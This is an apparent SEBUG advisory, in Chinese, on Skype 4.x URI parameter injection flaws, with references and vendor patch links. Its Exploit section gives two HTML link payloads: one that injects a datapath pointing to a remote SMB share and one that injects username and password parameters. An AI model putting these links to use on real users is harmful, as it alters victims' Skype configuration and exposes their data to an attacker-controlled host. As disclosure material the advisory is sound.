Skype 4.x
Skype URI参数处理多个安全漏洞
SEBUG-ID:19279
SEBUG-Appdir:Skype
Published:2010-01-04
Vulnerable:
Discription:
BUGTRAQ ID: 38699 Skype是一款流行的P2P VoIP软件,可提供高质量的语音通讯服务。 Skype在处理URI中的参数串时存在输入验证漏洞,远程攻击者可能利用此漏洞修改用户的配置或访问某些敏感信息。 URI中可能包含的/Datapath参数可以指向恶意的SMB共享,攻击者可以通过诱使用户点击恶意的skype: URI来利用漏洞。 此外Skype在处理skype-plugin:协议时也没有正确的过滤恶意URI参数,用户跟随恶意链接就可能导致删除任意指定的XML文件。
<*References
http://secunia.com/advisories/38908/*>
http://secunia.com/advisories/38875/
http://marc.info/?l=bugtraq&m=126832796811895&w=2
http://marc.info/?l=bugtraq&m=126843238916086&w=2
http://marc.info/?l=bugtraq&m=126843306616880&w=2
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<a href=skype:A"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>Click Me</a> <a href=skype:A"0x01/secondary0x01/username:"test”0x01/password:”test>Click Me</a>
SEBUG Solution:
厂商补丁: Skype ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://developer.skype.com/WindowsSkype/ReleaseNotes http://share.skype.com/sites/garage/2010/03/10/ReleaseNotes_4.2.0.155.pdf
// sebug.net [2010-03-17]